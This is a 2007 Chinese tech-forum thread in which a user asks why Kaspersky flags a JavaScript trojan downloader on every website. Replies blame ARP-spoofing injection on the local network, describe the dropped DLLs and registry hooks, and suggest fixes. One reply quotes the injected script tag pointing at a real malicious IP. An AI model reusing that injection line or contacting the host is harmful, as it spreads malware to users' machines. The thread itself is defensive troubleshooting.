一上网就检测到木马，不管哪个网站，新浪也是，为什么？急！急！急！

hlkevin

刚装的KIS7.0官方修正中文版，没做任何设置都是默认的，但一上网就说检测到木马2007-9-13 9:17:44        恶意HTTP对象 <http://67.19.116.187/1.js//JSPack>：检测到木马程序 'Trojan-Downloader.JS.Agent.oq'。　
都是这样的木马，连上新浪时都显示这个，不上网扫描一遍电脑又没有发现，这是为什么？哪设置的问题？高手请指教，在线等，谢过先！

yyasong

你是局域网用户吗

应该是你们局域网里面有人中arp病毒了

你下载个arp防火墙，开启保护就行了

jxsljj2006

你把IE临时文件清理一下试试.

woai_jolin

这个木马首先有一个主病毒,目前还不知道哪个恶意网站上有, 这个主病毒被没有arp防火墙的居域网内任何一主机感染后 开始 伪造数据包进行arp挂马,
症状为:
只要你浏览他设定的网页(或全部王页) 全部带有挂马信息    如果你在本机开了服务器，别人浏览你的网站 同样会带有挂马信息    但是你打开你本机上的网站源代码却没有这些挂马语句。

1、用IE内核浏览器浏览百度 瑞星 等等网站时 网页头部会被嵌入
<script src=http://67.19.116.187/1.js>

=========================================

2、上面那个文件是用来下载其他木马 主木马和所下载木马全为dll木马 主木马只有一个功能：就是进行欺骗 使之下载其他木马
感染主木马的主机后重起一次后生效(实践中)，开始下载辅助木马，这个主木隐藏最深。

3、再来说说后来下载的这些辅助木马
        
这些木马位置为：系统盘:\Documents and Settings\当前用户名\Local Settings\Temp 下
                             建立 1.exe~11.exe 以及两个~*.tmp文件。

                           windows下建立1~2个~*.tmp文件,它会被浏览器调用cmd.exe 执行,光知道执行后会打开3389服务,其他的我水平太菜 没看懂 -_-!
     
                            在%systemroot%下建立:
                                   wodoor0.dll
                                   dhdoor0.dll
                                   qjdoor0.dll
                                   wddoor0.dll
                                   tldoor0.dll
                                   zxdoor0.dll
                                   mydoor0.dll。
                                       .........
                                    *door0.dll

          这些dll文件会把自己插入到 explorer 进程中，如果你启动regedit它们同样会被插入到regedit中
          同时在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks 下 建立启动项：
          {08E909A4-B236-48DD-8BCC-90A604B93E68} 数值为：hook tl
          {0DAEBA6A-86CA-4B96-AF96-0C8C2C358FBD} 数值为：hook dh3
          {4E3FBFA4-F1CC-4B66-B333-B9F0FF4B4748} 数值为：hook my
          {5731EA1D-6AAF-4DE9-BDDA-7B390A75B286} 数值为：hook wo
          {6826A3DB-EA8E-4E67-880D-53D04C7C0BD8} 数值为：hook qj
          {781FBCC1-99C7-4AE0-95F7-66EA49E86DD7} 数值为：hook zx

[ 本帖最后由 woai_jolin 于 2007-9-13 12:51 编辑 ]

wwwsohu

原帖由 woai_jolin 于 2007-9-13 12:49 发表
这个木马首先有一个主病毒,目前还不知道哪个恶意网站上有, 这个主病毒被没有arp防火墙的居域网内任何一主机感染后 开始 伪造数据包进行arp挂马,
症状为:
只要你浏览他设定的网页(或全部王页) 全部带有挂马信息     ...

解决办法呢？

hlkevin

哪我该怎么办？我想我应该是还没中毒，但一开网页就弹出检测到木马，太烦了，但又不能把保护关掉

key

原帖由 yyasong 于 2007-9-13 12:01 发表
你是局域网用户吗

应该是你们局域网里面有人中arp病毒了

你下载个arp防火墙，开启保护就行了

正解！

zhiyan

首先应该确定你安装的xp操作系统 是原版还是网上的修改版!?

网上的各种修改版本的xp系统 (比如juju猫的电脑城版,电脑公司ghost版以及其他各种修改版)的确 存在有后门ip和插件!

建议用比较干净的操作系统

[ 本帖最后由 zhiyan 于 2007-9-13 17:27 编辑 ]

magic659117852

ARP  你自己能做的是hosts[屏蔽那个恶意站点或安装ARP防火墙。。

彻底解决办法是找出局域网内中招的机器杀之。。。